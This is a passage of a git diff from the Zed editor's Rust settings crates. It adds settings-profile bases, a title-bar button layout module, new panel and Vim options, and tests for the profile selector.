Deserialize, PartialEq, JsonSchema, MergeFrom)] #[serde(untagged)] pub enum SemanticTokenColorOverride { diff --git a/crates/settings_content/src/settings_content.rs b/crates/settings_content/src/settings_content.rs index f94c6a0b98d7fa23686dc1c89012e3b1fe476c70..6c60a7010f7cfc5b4fadf9a8cc386fe6e3267abc 100644 --- a/crates/settings_content/src/settings_content.rs +++ b/crates/settings_content/src/settings_content.rs @@ -9,6 +9,7 @@ mod project; mod serde_helper; mod terminal; mod theme; +mod title_bar; mod workspace; pub use agent::*; @@ -26,6 +27,7 @@ pub use serde_helper::{ use settings_json::parse_json_with_comments; pub use terminal::*; pub use theme::*; +pub use title_bar::*; pub use workspace::*; use collections::{HashMap, IndexMap}; @@ -63,7 +65,8 @@ macro_rules! 
settings_overrides { } } } -use std::collections::BTreeSet; +use std::collections::{BTreeMap, BTreeSet}; +use std::hash::Hash; use std::sync::Arc; pub use util::serde::default_true; @@ -202,6 +205,13 @@ pub struct SettingsContent { /// Settings related to Vim mode in Zed. pub vim: Option, + + /// Number of lines to search for modelines at the beginning and end of files. + /// Modelines contain editor directives (e.g., vim/emacs settings) that configure + /// the editor behavior for specific files. + /// + /// Default: 5 + pub modeline_lines: Option, } impl SettingsContent { @@ -255,6 +265,35 @@ settings_overrides! { pub struct PlatformOverrides { macos, linux, windows } } +/// Determines what settings a profile starts from before applying its overrides. +#[derive( + Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize, JsonSchema, MergeFrom, +)] +#[serde(rename_all = "snake_case")] +pub enum ProfileBase { + /// Apply profile settings on top of the user's current settings. + #[default] + User, + /// Apply profile settings on top of Zed's default settings, ignoring user customizations. + Default, +} + +/// A named settings profile that can temporarily override settings. +#[with_fallible_options] +#[derive(Debug, Default, PartialEq, Clone, Serialize, Deserialize, JsonSchema, MergeFrom)] +pub struct SettingsProfile { + /// What base settings to start from before applying this profile's overrides. + /// + /// - `user`: Apply on top of user's settings (default) + /// - `default`: Apply on top of Zed's default settings, ignoring user customizations + #[serde(default)] + pub base: ProfileBase, + + /// The settings overrides for this profile. 
+ #[serde(default)] + pub settings: Box, +} + #[with_fallible_options] #[derive(Debug, Default, PartialEq, Clone, Serialize, Deserialize, JsonSchema, MergeFrom)] pub struct UserSettingsContent { @@ -268,7 +307,7 @@ pub struct UserSettingsContent { pub platform_overrides: PlatformOverrides, #[serde(default)] - pub profiles: IndexMap, + pub profiles: IndexMap, } pub struct ExtensionsSettingsContent { @@ -316,54 +355,10 @@ impl strum::VariantNames for BaseKeymapContent { ]; } -#[with_fallible_options] -#[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)] -pub struct TitleBarSettingsContent { - /// Whether to show the branch icon beside branch switcher in the title bar. - /// - /// Default: false - pub show_branch_icon: Option, - /// Whether to show onboarding banners in the title bar. - /// - /// Default: true - pub show_onboarding_banner: Option, - /// Whether to show user avatar in the title bar. - /// - /// Default: true - pub show_user_picture: Option, - /// Whether to show the branch name button in the titlebar. - /// - /// Default: true - pub show_branch_name: Option, - /// Whether to show the project host and name in the titlebar. - /// - /// Default: true - pub show_project_items: Option, - /// Whether to show the sign in button in the title bar. - /// - /// Default: true - pub show_sign_in: Option, - /// Whether to show the user menu button in the title bar. - /// - /// Default: true - pub show_user_menu: Option, - /// Whether to show the menus in the title bar. - /// - /// Default: false - pub show_menus: Option, -} - /// Configuration of audio in Zed. #[with_fallible_options] #[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)] pub struct AudioSettingsContent { - /// Opt into the new audio system. 
- /// - /// You need to rejoin a call for this setting to apply - #[serde(rename = "experimental.rodio_audio")] - pub rodio_audio: Option, // default is false - /// Requires 'rodio_audio: true' - /// /// Automatically increase or decrease you microphone's volume. This affects how /// loud you sound to others. /// @@ -373,35 +368,11 @@ pub struct AudioSettingsContent { /// compared to other speakers. #[serde(rename = "experimental.auto_microphone_volume")] pub auto_microphone_volume: Option, - /// Requires 'rodio_audio: true' - /// - /// Automatically increate or decrease the volume of other call members. - /// This only affects how things sound for you. - #[serde(rename = "experimental.auto_speaker_volume")] - pub auto_speaker_volume: Option, - /// Requires 'rodio_audio: true' - /// /// Remove background noises. Works great for typing, cars, dogs, AC. Does /// not work well on music. - #[serde(rename = "experimental.denoise")] - pub denoise: Option, - /// Requires 'rodio_audio: true' - /// - /// Use audio parameters compatible with the previous versions of - /// experimental audio and non-experimental audio. When this is false you - /// will sound strange to anyone not on the latest experimental audio. In - /// the future we will migrate by setting this to false - /// - /// You need to rejoin a call for this setting to apply - #[serde(rename = "experimental.legacy_audio_compatible")] - pub legacy_audio_compatible: Option, - /// Requires 'rodio_audio: true' - /// /// Select specific output audio device. #[serde(rename = "experimental.output_audio_device")] pub output_audio_device: Option, - /// Requires 'rodio_audio: true' - /// /// Select specific input audio device. #[serde(rename = "experimental.input_audio_device")] pub input_audio_device: Option, @@ -542,22 +513,6 @@ pub enum DockPosition { Right, } -/// Settings for slash commands. 
-#[with_fallible_options] -#[derive(Deserialize, Serialize, Debug, Default, Clone, JsonSchema, MergeFrom, PartialEq, Eq)] -pub struct SlashCommandSettings { - /// Settings for the `/cargo-workspace` slash command. - pub cargo_workspace: Option, -} - -/// Settings for the `/cargo-workspace` slash command. -#[with_fallible_options] -#[derive(Deserialize, Serialize, Debug, Default, Clone, JsonSchema, MergeFrom, PartialEq, Eq)] -pub struct CargoWorkspaceCommandSettings { - /// Whether `/cargo-workspace` is enabled. - pub enabled: Option, -} - /// Configuration of voice calls in Zed. #[with_fallible_options] #[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)] @@ -593,6 +548,17 @@ pub struct GitPanelSettingsContent { /// /// Default: icon pub status_style: Option, + + /// Whether to show file icons in the git panel. + /// + /// Default: false + pub file_icons: Option, + + /// Whether to show folder icons or chevrons for directories in the git panel. + /// + /// Default: true + pub folder_icons: Option, + /// How and when the scrollbar should be displayed. /// /// Default: inherits editor scrollbar settings @@ -622,8 +588,18 @@ pub struct GitPanelSettingsContent { /// Whether to show the addition/deletion change count next to each file in the Git panel. /// - /// Default: false + /// Default: true pub diff_stats: Option, + + /// Whether to show a badge on the git panel icon with the count of uncommitted changes. + /// + /// Default: false + pub show_count_badge: Option, + + /// Whether the git panel should open on startup. + /// + /// Default: false + pub starts_open: Option, } #[derive( @@ -671,6 +647,10 @@ pub struct NotificationPanelSettingsContent { /// Default: 300 #[serde(serialize_with = "crate::serialize_optional_f32_with_two_decimal_places")] pub default_width: Option, + /// Whether to show a badge on the notification panel icon with the count of unread notifications. 
+ /// + /// Default: false + pub show_count_badge: Option, } #[with_fallible_options] @@ -721,6 +701,10 @@ pub struct FileFinderSettingsContent { /// /// Default: Smart pub include_ignored: Option, + /// Whether to include text channels in file finder results. + /// + /// Default: false + pub include_channels: Option, } #[derive( @@ -779,6 +763,7 @@ pub struct VimSettingsContent { pub toggle_relative_line_numbers: Option, pub use_system_clipboard: Option, pub use_smartcase_find: Option, + pub use_regex_search: Option, /// When enabled, the `:substitute` command replaces all matches in a line /// by default. The 'g' flag then toggles this behavior., pub gdefault: Option, @@ -1069,6 +1054,8 @@ pub struct DevContainerConnection { pub remote_user: String, pub container_id: String, pub use_podman: bool, + pub extension_ids: Vec, + pub remote_env: BTreeMap, } #[with_fallible_options] @@ -1148,11 +1135,6 @@ pub struct ReplSettingsContent { /// /// Default: 0 pub output_max_height_lines: Option, - /// Maximum number of columns of output to display before scaling images. - /// Set to 0 to disable output width limits. - /// - /// Default: 0 - pub output_max_width_columns: Option, } /// Settings for configuring the which-key popup behaviour. @@ -1168,15 +1150,15 @@ pub struct WhichKeySettingsContent { pub delay_ms: Option, } +// An ExtendingVec in the settings can only accumulate new values. +// +// This is useful for things like private files where you only want +// to allow new values to be added. +// +// Consider using a HashMap instead of this type +// (like auto_install_extensions) so that user settings files can both add +// and remove values from the set. #[derive(Default, Debug, Clone, PartialEq, Serialize, Deserialize, JsonSchema)] -/// An ExtendingVec in the settings can only accumulate new values. -/// -/// This is useful for things like private files where you only want -/// to allow new values to be added. 
-/// -/// Consider using a HashMap instead of this type -/// (like auto_install_extensions) so that user settings files can both add -/// and remove values from the set. pub struct ExtendingVec(pub Vec); impl Into> for ExtendingVec { @@ -1196,10 +1178,10 @@ impl merge_from::MergeFrom for ExtendingVec { } } -/// A SaturatingBool in the settings can only ever be set to true, -/// later attempts to set it to false will be ignored. -/// -/// Used by `disable_ai`. +// A SaturatingBool in the settings can only ever be set to true, +// later attempts to set it to false will be ignored. +// +// Used by `disable_ai`. #[derive(Debug, Default, Copy, Clone, PartialEq, Serialize, Deserialize, JsonSchema)] pub struct SaturatingBool(pub bool); diff --git a/crates/settings_content/src/terminal.rs b/crates/settings_content/src/terminal.rs index a13613badfaa0a375dbcbdf6424e7bda59a84dc4..643dea18d106906d242ff21d0aadbc27492fd09b 100644 --- a/crates/settings_content/src/terminal.rs +++ b/crates/settings_content/src/terminal.rs @@ -129,6 +129,10 @@ pub struct TerminalSettingsContent { /// Default: true pub button: Option, pub dock: Option, + /// Whether the terminal panel should use flexible (proportional) sizing. + /// + /// Default: true + pub flexible: Option, /// Default width when the terminal is docked to the left or right. /// /// Default: 640 @@ -171,6 +175,10 @@ pub struct TerminalSettingsContent { /// Default: 45 #[serde(serialize_with = "crate::serialize_optional_f32_with_two_decimal_places")] pub minimum_contrast: Option, + /// Whether to show a badge on the terminal panel icon with the count of open terminals. + /// + /// Default: false + pub show_count_badge: Option, } /// Shell configuration to open the terminal with. 
diff --git a/crates/settings_content/src/title_bar.rs b/crates/settings_content/src/title_bar.rs new file mode 100644 index 0000000000000000000000000000000000000000..af5e30f361c7603aba72de3b5734ae78ab366171 --- /dev/null +++ b/crates/settings_content/src/title_bar.rs @@ -0,0 +1,124 @@ +use gpui::WindowButtonLayout; +use schemars::{JsonSchema, Schema, SchemaGenerator, json_schema}; +use serde::{Deserialize, Serialize}; +use settings_macros::{MergeFrom, with_fallible_options}; + +/// The layout of window control buttons as represented by user settings. +/// +/// Custom layout strings use the GNOME `button-layout` format (e.g. +/// `"close:minimize,maximize"`). +#[derive( + Clone, + PartialEq, + Debug, + Serialize, + Deserialize, + JsonSchema, + MergeFrom, + Default, + strum::EnumDiscriminants, +)] +#[strum_discriminants(derive(strum::VariantArray, strum::VariantNames, strum::FromRepr))] +#[schemars(schema_with = "window_button_layout_schema")] +#[serde(from = "String", into = "String")] +pub enum WindowButtonLayoutContent { + /// Follow the system/desktop configuration. + #[default] + PlatformDefault, + /// Use Zed's built-in standard layout, regardless of system config. + Standard, + /// A raw GNOME-style layout string. 
+ Custom(String), +} + +impl WindowButtonLayoutContent { + #[cfg(any(target_os = "linux", target_os = "freebsd"))] + pub fn into_layout(self) -> Option { + use util::ResultExt; + + match self { + Self::PlatformDefault => None, + Self::Standard => Some(WindowButtonLayout::linux_default()), + Self::Custom(layout) => WindowButtonLayout::parse(&layout).log_err(), + } + } + + #[cfg(not(any(target_os = "linux", target_os = "freebsd")))] + pub fn into_layout(self) -> Option { + None + } +} + +fn window_button_layout_schema(_: &mut SchemaGenerator) -> Schema { + json_schema!({ + "anyOf": [ + { "enum": ["platform_default", "standard"] }, + { "type": "string" } + ] + }) +} + +impl From for String { + fn from(value: WindowButtonLayoutContent) -> Self { + match value { + WindowButtonLayoutContent::PlatformDefault => "platform_default".to_string(), + WindowButtonLayoutContent::Standard => "standard".to_string(), + WindowButtonLayoutContent::Custom(s) => s, + } + } +} + +impl From for WindowButtonLayoutContent { + fn from(layout_string: String) -> Self { + match layout_string.as_str() { + "platform_default" => Self::PlatformDefault, + "standard" => Self::Standard, + _ => Self::Custom(layout_string), + } + } +} + +#[with_fallible_options] +#[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)] +pub struct TitleBarSettingsContent { + /// Whether to show the branch icon beside branch switcher in the title bar. + /// + /// Default: false + pub show_branch_icon: Option, + /// Whether to show onboarding banners in the title bar. + /// + /// Default: true + pub show_onboarding_banner: Option, + /// Whether to show user avatar in the title bar. + /// + /// Default: true + pub show_user_picture: Option, + /// Whether to show the branch name button in the titlebar. + /// + /// Default: true + pub show_branch_name: Option, + /// Whether to show the project host and name in the titlebar. 
+ /// + /// Default: true + pub show_project_items: Option, + /// Whether to show the sign in button in the title bar. + /// + /// Default: true + pub show_sign_in: Option, + /// Whether to show the user menu button in the title bar. + /// + /// Default: true + pub show_user_menu: Option, + /// Whether to show the menus in the title bar. + /// + /// Default: false + pub show_menus: Option, + /// The layout of window control buttons in the title bar (Linux only). + /// + /// This can be set to "platform_default" to follow the system configuration, or + /// "standard" to use Zed's built-in layout. For custom layouts, use a + /// GNOME-style layout string like "close:minimize,maximize". + /// + /// Default: "platform_default" + pub button_layout: Option, +} diff --git a/crates/settings_content/src/workspace.rs b/crates/settings_content/src/workspace.rs index 7262a83b384665b0bcd868bf14dbfaa2928a35c1..0bae7c260f6607f2015f750e5bb9dec7cc26342d 100644 --- a/crates/settings_content/src/workspace.rs +++ b/crates/settings_content/src/workspace.rs @@ -6,8 +6,8 @@ use serde::{Deserialize, Serialize}; use settings_macros::{MergeFrom, with_fallible_options}; use crate::{ - CenteredPaddingSettings, DelayMs, DockPosition, DockSide, InactiveOpacity, - ScrollbarSettingsContent, ShowIndentGuides, serialize_optional_f32_with_two_decimal_places, + CenteredPaddingSettings, DelayMs, DockPosition, DockSide, InactiveOpacity, ShowIndentGuides, + ShowScrollbar, serialize_optional_f32_with_two_decimal_places, }; #[with_fallible_options] @@ -122,6 +122,9 @@ pub struct WorkspaceSettingsContent { /// What draws window decorations/titlebar, the client application (Zed) or display server /// Default: client pub window_decorations: Option, + /// Whether the focused panel follows the mouse location + /// Default: false + pub focus_follows_mouse: Option, } #[with_fallible_options] @@ -434,6 +437,10 @@ pub struct StatusBarSettingsContent { /// Default: true #[serde(rename = "experimental.show")] pub 
show: Option, + /// Whether to show the name of the active file in the status bar. + /// + /// Default: false + pub show_active_file: Option, /// Whether to display the active language button in the status bar. /// /// Default: true @@ -710,7 +717,7 @@ pub struct ProjectPanelSettingsContent { /// Default: true pub starts_open: Option, /// Scrollbar-related settings - pub scrollbar: Option, + pub scrollbar: Option, /// Which files containing diagnostic errors/warnings to mark in the project panel. /// /// Default: all @@ -741,8 +748,12 @@ pub struct ProjectPanelSettingsContent { pub sort_mode: Option, /// Whether to show error and warning count badges next to file names in the project panel. /// - /// Default: true + /// Default: false pub diagnostic_badges: Option, + /// Whether to show a git status indicator next to file names in the project panel. + /// + /// Default: false + pub git_status_indicator: Option, } #[derive( @@ -793,6 +804,23 @@ pub enum ProjectPanelSortMode { FilesFirst, } +#[with_fallible_options] +#[derive( + Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, MergeFrom, PartialEq, Eq, Default, +)] +pub struct ProjectPanelScrollbarSettingsContent { + /// When to show the scrollbar in the project panel. + /// + /// Default: inherits editor scrollbar settings + pub show: Option, + /// Whether to allow horizontal scrolling in the project panel. + /// When false, the view is locked to the leftmost position and + /// long file names are clipped. 
+ /// + /// Default: true + pub horizontal_scroll: Option, +} + #[with_fallible_options] #[derive( Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, MergeFrom, PartialEq, Eq, Default, @@ -903,3 +931,10 @@ impl DocumentSymbols { self == &Self::On } } + +#[with_fallible_options] +#[derive(Copy, Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)] +pub struct FocusFollowsMouse { + pub enabled: Option, + pub debounce_ms: Option, +} diff --git a/crates/settings_json/Cargo.toml b/crates/settings_json/Cargo.toml index 2ba9887ca016b645bafa2974bbd9029373348838..aeaf5ec3c16a9c0d0fc6e9be047fb33a4ab74373 100644 --- a/crates/settings_json/Cargo.toml +++ b/crates/settings_json/Cargo.toml @@ -27,9 +27,3 @@ serde_path_to_error.workspace = true [dev-dependencies] unindent.workspace = true pretty_assertions.workspace = true - -# Uncomment other workspace dependencies as needed -# assistant.workspace = true -# client.workspace = true -# project.workspace = true -# settings.workspace = true diff --git a/crates/settings_profile_selector/Cargo.toml b/crates/settings_profile_selector/Cargo.toml index 23ccac2e43dec6c1ab335eeb2ffb4d9159d85859..2e4608672847b608e2f6b0c48c5122bf76f3b5e7 100644 --- a/crates/settings_profile_selector/Cargo.toml +++ b/crates/settings_profile_selector/Cargo.toml @@ -22,13 +22,12 @@ workspace.workspace = true zed_actions.workspace = true [dev-dependencies] -client = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } -language = { workspace = true, features = ["test-support"] } menu.workspace = true project = { workspace = true, features = ["test-support"] } serde_json.workspace = true settings = { workspace = true, features = ["test-support"] } theme = { workspace = true, features = ["test-support"] } +theme_settings.workspace = true workspace = { workspace = true, features = ["test-support"] } diff --git 
a/crates/settings_profile_selector/src/settings_profile_selector.rs b/crates/settings_profile_selector/src/settings_profile_selector.rs index 7ca91e3767efb6b550af7887e70a0187fed6daad..c273a08ce7427880a02cb375561aaaade2607b83 100644 --- a/crates/settings_profile_selector/src/settings_profile_selector.rs +++ b/crates/settings_profile_selector/src/settings_profile_selector.rs @@ -286,12 +286,12 @@ mod tests { use project::{FakeFs, Project}; use serde_json::json; use settings::Settings; - use theme::{self, ThemeSettings}; + use theme_settings::ThemeSettings; use workspace::{self, AppState, MultiWorkspace}; use zed_actions::settings_profile_selector; async fn init_test( - profiles_json: serde_json::Value, + user_settings_json: serde_json::Value, cx: &mut TestAppContext, ) -> (Entity, &mut VisualTestContext) { cx.update(|cx| { @@ -299,7 +299,7 @@ mod tests { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); settings::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); super::init(cx); editor::init(cx); state @@ -307,13 +307,8 @@ mod tests { cx.update(|cx| { SettingsStore::update_global(cx, |store, cx| { - let settings_json = json!({ - "buffer_font_size": 10.0, - "profiles": profiles_json, - }); - store - .set_user_settings(&settings_json.to_string(), cx) + .set_user_settings(&user_settings_json.to_string(), cx) .unwrap(); }); }); @@ -328,7 +323,6 @@ mod tests { cx.update(|_, cx| { assert!(!cx.has_global::()); - assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(10.0)); }); (workspace, cx) @@ -354,15 +348,22 @@ mod tests { let classroom_and_streaming_profile_name = "Classroom / Streaming".to_string(); let demo_videos_profile_name = "Demo Videos".to_string(); - let profiles_json = json!({ - classroom_and_streaming_profile_name.clone(): { - "buffer_font_size": 20.0, - }, - demo_videos_profile_name.clone(): { - "buffer_font_size": 15.0 + let user_settings_json = json!({ + 
"buffer_font_size": 10.0, + "profiles": { + classroom_and_streaming_profile_name.clone(): { + "settings": { + "buffer_font_size": 20.0, + } + }, + demo_videos_profile_name.clone(): { + "settings": { + "buffer_font_size": 15.0 + } + } } }); - let (workspace, cx) = init_test(profiles_json.clone(), cx).await; + let (workspace, cx) = init_test(user_settings_json, cx).await; cx.dispatch_action(settings_profile_selector::Toggle); let picker = active_settings_profile_picker(&workspace, cx); @@ -575,24 +576,134 @@ mod tests { }); } + #[gpui::test] + async fn test_settings_profile_with_user_base(cx: &mut TestAppContext) { + let user_settings_json = json!({ + "buffer_font_size": 10.0, + "profiles": { + "Explicit User": { + "base": "user", + "settings": { + "buffer_font_size": 20.0 + } + }, + "Implicit User": { + "settings": { + "buffer_font_size": 20.0 + } + } + } + }); + let (workspace, cx) = init_test(user_settings_json, cx).await; + + // Select "Explicit User" (index 1) — profile applies on top of user settings. + cx.dispatch_action(settings_profile_selector::Toggle); + let picker = active_settings_profile_picker(&workspace, cx); + cx.dispatch_action(SelectNext); + + picker.read_with(cx, |picker, cx| { + assert_eq!( + picker.delegate.selected_profile_name.as_deref(), + Some("Explicit User") + ); + assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(20.0)); + }); + + cx.dispatch_action(Confirm); + + // Select "Implicit User" (index 2) — no base specified, same behavior. 
+ cx.dispatch_action(settings_profile_selector::Toggle); + let picker = active_settings_profile_picker(&workspace, cx); + cx.dispatch_action(SelectNext); + + picker.read_with(cx, |picker, cx| { + assert_eq!( + picker.delegate.selected_profile_name.as_deref(), + Some("Implicit User") + ); + assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(20.0)); + }); + + cx.dispatch_action(Confirm); + } + + #[gpui::test] + async fn test_settings_profile_with_default_base(cx: &mut TestAppContext) { + let user_settings_json = json!({ + "buffer_font_size": 10.0, + "profiles": { + "Clean Slate": { + "base": "default" + }, + "Custom on Defaults": { + "base": "default", + "settings": { + "buffer_font_size": 30.0 + } + } + } + }); + let (workspace, cx) = init_test(user_settings_json, cx).await; + + // User has buffer_font_size: 10, factory default is 15. + cx.update(|_, cx| { + assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(10.0)); + }); + + // "Clean Slate" has base: "default" with no settings overrides, + // so we get the factory default (15), not the user's value (10). + cx.dispatch_action(settings_profile_selector::Toggle); + let picker = active_settings_profile_picker(&workspace, cx); + cx.dispatch_action(SelectNext); + + picker.read_with(cx, |picker, cx| { + assert_eq!( + picker.delegate.selected_profile_name.as_deref(), + Some("Clean Slate") + ); + assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(15.0)); + }); + + // "Custom on Defaults" has base: "default" with buffer_font_size: 30, + // so the profile's override (30) applies on top of the factory default, + // not on top of the user's value (10). 
+ cx.dispatch_action(SelectNext); + + picker.read_with(cx, |picker, cx| { + assert_eq!( + picker.delegate.selected_profile_name.as_deref(), + Some("Custom on Defaults") + ); + assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(30.0)); + }); + + cx.dispatch_action(Confirm); + + cx.update(|_, cx| { + assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(30.0)); + }); + } + #[gpui::test] async fn test_settings_profile_selector_is_in_user_configuration_order( cx: &mut TestAppContext, ) { // Must be unique names (HashMap) - let profiles_json = json!({ - "z": {}, - "e": {}, - "d": {}, - " ": {}, - "r": {}, - "u": {}, - "l": {}, - "3": {}, - "s": {}, - "!": {}, + let user_settings_json = json!({ + "profiles": { + "z": { "settings": {} }, + "e": { "settings": {} }, + "d": { "settings": {} }, + " ": { "settings": {} }, + "r": { "settings": {} }, + "u": { "settings": {} }, + "l": { "settings": {} }, + "3": { "settings": {} }, + "s": { "settings": {} }, + "!": { "settings": {} }, + } }); - let (workspace, cx) = init_test(profiles_json.clone(), cx).await; + let (workspace, cx) = init_test(user_settings_json, cx).await; cx.dispatch_action(settings_profile_selector::Toggle); let picker = active_settings_profile_picker(&workspace, cx); diff --git a/crates/settings_ui/Cargo.toml b/crates/settings_ui/Cargo.toml index 399534b968dfba941d17e2f6ce76261ca4e71859..0228f6886fc741505ffbe02fe82242d5f3e1dfd4 100644 --- a/crates/settings_ui/Cargo.toml +++ b/crates/settings_ui/Cargo.toml @@ -28,6 +28,7 @@ cpal.workspace = true edit_prediction.workspace = true edit_prediction_ui.workspace = true editor.workspace = true +feature_flags.workspace = true fs.workspace = true futures.workspace = true fuzzy.workspace = true @@ -53,26 +54,21 @@ shell_command_parser.workspace = true strum.workspace = true telemetry.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true zed_actions.workspace 
= true +zed_credentials_provider.workspace = true [dev-dependencies] -assets.workspace = true -client.workspace = true fs = { workspace = true, features = ["test-support"] } futures.workspace = true gpui = { workspace = true, features = ["test-support"] } -language.workspace = true -node_runtime.workspace = true paths.workspace = true pretty_assertions.workspace = true project = { workspace = true, features = ["test-support"] } -recent_projects = { workspace = true, features = ["test-support"] } serde_json.workspace = true -session.workspace = true settings = { workspace = true, features = ["test-support"] } title_bar = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } -zlog.workspace = true diff --git a/crates/settings_ui/src/components/input_field.rs b/crates/settings_ui/src/components/input_field.rs index e0acfe486d31db373a5de43aa64e1b6e28ce78cf..35e63078c154dd324c8dd622b8d98c2de36beb68 100644 --- a/crates/settings_ui/src/components/input_field.rs +++ b/crates/settings_ui/src/components/input_field.rs @@ -3,7 +3,7 @@ use std::rc::Rc; use editor::Editor; use gpui::{AnyElement, ElementId, Focusable, TextStyleRefinement}; use settings::Settings as _; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{Tooltip, prelude::*, rems}; #[derive(IntoElement)] diff --git a/crates/settings_ui/src/page_data.rs b/crates/settings_ui/src/page_data.rs index afc84a9f9b91e32f3a110e19dc78db5634369458..9978832c05bb29c97f118fccbe301214d81fa0c6 100644 --- a/crates/settings_ui/src/page_data.rs +++ b/crates/settings_ui/src/page_data.rs @@ -1,3 +1,4 @@ +use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt as _}; use gpui::{Action as _, App}; use itertools::Itertools as _; use settings::{ @@ -74,7 +75,7 @@ pub(crate) fn settings_data(cx: &App) -> Vec { terminal_page(), version_control_page(), collaboration_page(), - ai_page(), + ai_page(cx), network_page(), ] } @@ -410,9 +411,9 @@ fn appearance_page() -> 
SettingsPage { settings::ThemeSelection::Static(_) => return, settings::ThemeSelection::Dynamic { mode, light, dark } => { match mode { - theme::ThemeAppearanceMode::Light => light.clone(), - theme::ThemeAppearanceMode::Dark => dark.clone(), - theme::ThemeAppearanceMode::System => dark.clone(), // no cx, can't determine correct choice + theme_settings::ThemeAppearanceMode::Light => light.clone(), + theme_settings::ThemeAppearanceMode::Dark => dark.clone(), + theme_settings::ThemeAppearanceMode::System => dark.clone(), // no cx, can't determine correct choice } }, }; @@ -580,9 +581,9 @@ fn appearance_page() -> SettingsPage { settings::IconThemeSelection::Static(_) => return, settings::IconThemeSelection::Dynamic { mode, light, dark } => { match mode { - theme::ThemeAppearanceMode::Light => light.clone(), - theme::ThemeAppearanceMode::Dark => dark.clone(), - theme::ThemeAppearanceMode::System => dark.clone(), // no cx, can't determine correct choice + theme_settings::ThemeAppearanceMode::Light => light.clone(), + theme_settings::ThemeAppearanceMode::Dark => dark.clone(), + theme_settings::ThemeAppearanceMode::System => dark.clone(), // no cx, can't determine correct choice } }, }; @@ -801,7 +802,8 @@ fn appearance_page() -> SettingsPage { } settings::BufferLineHeightDiscriminants::Custom => { let custom_value = - theme::BufferLineHeight::from(*settings_value).value(); + theme_settings::BufferLineHeight::from(*settings_value) + .value(); settings::BufferLineHeight::Custom(custom_value) } }; @@ -1293,17 +1295,13 @@ fn keymap_page() -> SettingsPage { fn modal_editing_section() -> [SettingsPageItem; 3] { [ SettingsPageItem::SectionHeader("Modal Editing"), - // todo(settings_ui): Vim/Helix Mode should be apart of one type because it's undefined - // behavior to have them both enabled at the same time SettingsPageItem::SettingItem(SettingItem { title: "Vim Mode", description: "Enable Vim mode and key bindings.", field: Box::new(SettingField { json_path: Some("vim_mode"), 
pick: |settings_content| settings_content.vim_mode.as_ref(), - write: |settings_content, value| { - settings_content.vim_mode = value; - }, + write: write_vim_mode, }), metadata: None, files: USER, @@ -1314,9 +1312,7 @@ fn keymap_page() -> SettingsPage { field: Box::new(SettingField { json_path: Some("helix_mode"), pick: |settings_content| settings_content.helix_mode.as_ref(), - write: |settings_content, value| { - settings_content.helix_mode = value; - }, + write: write_helix_mode, }), metadata: None, files: USER, @@ -1478,7 +1474,7 @@ fn editor_page() -> SettingsPage { ] } - fn multibuffer_section() -> [SettingsPageItem; 6] { + fn multibuffer_section() -> [SettingsPageItem; 7] { [ SettingsPageItem::SectionHeader("Multibuffer"), SettingsPageItem::SettingItem(SettingItem { @@ -1558,6 +1554,21 @@ fn editor_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Minimum Split Diff Width", + description: "The minimum width (in columns) at which the split diff view is used. When the editor is narrower, the diff view automatically switches to unified mode. 
Set to 0 to disable.", + field: Box::new(SettingField { + json_path: Some("minimum_split_diff_width"), + pick: |settings_content| { + settings_content.editor.minimum_split_diff_width.as_ref() + }, + write: |settings_content, value| { + settings_content.editor.minimum_split_diff_width = value; + }, + }), + metadata: None, + files: USER, + }), ] } @@ -2436,7 +2447,7 @@ fn editor_page() -> SettingsPage { ] } - fn vim_settings_section() -> [SettingsPageItem; 12] { + fn vim_settings_section() -> [SettingsPageItem; 13] { [ SettingsPageItem::SectionHeader("Vim"), SettingsPageItem::SettingItem(SettingItem { @@ -2545,6 +2556,24 @@ fn editor_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Regex Search", + description: "Use regex search by default in Vim search.", + field: Box::new(SettingField { + json_path: Some("vim.use_regex_search"), + pick: |settings_content| { + settings_content.vim.as_ref()?.use_regex_search.as_ref() + }, + write: |settings_content, value| { + settings_content + .vim + .get_or_insert_default() + .use_regex_search = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Cursor Shape - Normal Mode", description: "Cursor shape for normal mode.", @@ -3332,7 +3361,7 @@ fn search_and_files_page() -> SettingsPage { } fn window_and_layout_page() -> SettingsPage { - fn status_bar_section() -> [SettingsPageItem; 9] { + fn status_bar_section() -> [SettingsPageItem; 10] { [ SettingsPageItem::SectionHeader("Status Bar"), SettingsPageItem::SettingItem(SettingItem { @@ -3477,10 +3506,32 @@ fn window_and_layout_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Active File Name", + description: "Show the name of the active file in the status bar.", + field: Box::new(SettingField { + json_path: Some("status_bar.show_active_file"), + pick: |settings_content| { + settings_content + 
